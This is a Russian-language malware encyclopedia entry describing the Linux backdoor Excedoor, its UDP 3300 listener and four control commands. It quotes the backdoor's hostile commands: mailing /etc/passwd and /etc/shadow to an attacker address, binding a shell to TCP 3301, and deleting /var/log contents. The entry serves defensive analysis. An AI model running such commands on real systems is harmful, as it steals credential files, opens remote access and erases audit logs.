Backdoor.Linux.Excedoor

Материал из Total Malware Info

Перейти к: навигация, поиск

Backdoor.Linux.Excedoor Троянская программа, предоставляющая злоумышленнику удаленный доступ к зараженному компьютеру. Является приложением Linux (ELF-файл). Имеет размер 8 149 байт.

Деструктивная активность

Бэкдор прослушивает 3300 UDP порт и ждет поступления управляющих команд от злоумышленника. Злоумышленник подключившись к бэкдору на указанный порт может выполнять следующие действия на компьютере жертвы: - при посылке команды “1”, бэкдор выполнит в командном интерпретаторе следующие команды: 

mail -s passwdforyababe gayz0r@boi.org.ie < /etc/passwd
mail -s shadowforyababe gayz0r@boi.org.ie < /etc/shadow

тем самым отправив на электронную почту gayz0r@boi.org.ie содержимое следующих файлов: 

/etc/passwd
/etc/shadow

- при посылке команды “2”, бэкдор запускает командный интерпретатор и перенаправляет его стандартный вывод и ввод на 3301 TCP порт, подключившись к которому можно выполнять любые команды на компьютере жертвы. - при посылке команды “3”, бэкдор выполняет следующую команду: 

rm -rf /var/log/*

- при посылке команды “4”, бэкдор завершает свою работу.

Источник — «http://www.totalmalwareinfo.com/rus/Backdoor.Linux.Excedoor»
Язык
Видеокурс
Computer and Internet Security Video Tutorials
© 2011 ООО «Лаборатория дизайн и тест». Все права защищены.